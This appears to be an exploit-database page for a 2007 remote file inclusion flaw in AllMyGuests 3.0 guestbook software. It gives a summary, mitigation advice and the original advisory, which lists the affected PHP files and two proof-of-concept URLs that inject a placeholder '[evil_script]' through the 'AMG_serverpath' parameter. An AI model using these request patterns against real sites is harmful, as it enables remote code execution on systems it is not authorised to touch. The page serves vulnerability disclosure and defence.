header-logo
Suggest Exploit
vendor:
AllMyGuests
by:
beks
5.5
CVSS
MEDIUM
Remote File Inclusion
98
CWE
Product Name: AllMyGuests
Affected Version From: 3
Affected Version To: 3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

AllMyGuests 3.0 Remote File Inclusion Vulnerability

The AllMyGuests 3.0 software is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by injecting malicious code into the 'AMG_serverpath' parameter in the 'comments.php' and 'signin.php' files. This allows the attacker to include and execute arbitrary files on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a newer version of AllMyGuests that has patched this issue. Additionally, input validation should be implemented to ensure that user-supplied data is properly sanitized before being used in file inclusion operations.
Source

Exploit-DB raw data:

AllMyGuests 3.0 Remote File Inclusion Vulnerability

#Software: AllMyGuests

#Version: 3.0

#Download: http://download.php-resource.net/AllMyGuests/AllMyGuests0.3.0.zip

#Found By: beks

#Bug In:

/include/submit.inc.php
/admin/index.php
/include/cm_submit.inc.php
/comments.php
/index.php
/signin.php

#Risk: Medium

http://[target]/[AllMyGuests_Path]/comments.php?AMG_serverpath=[evil_script]
http://[target]/[AllMyGuests_Path]/signin.php?sent=1&AMG_serverpath=[evil_script]

# milw0rm.com [2007-01-07]

Navigation

Suggest Exploit

Services By CQR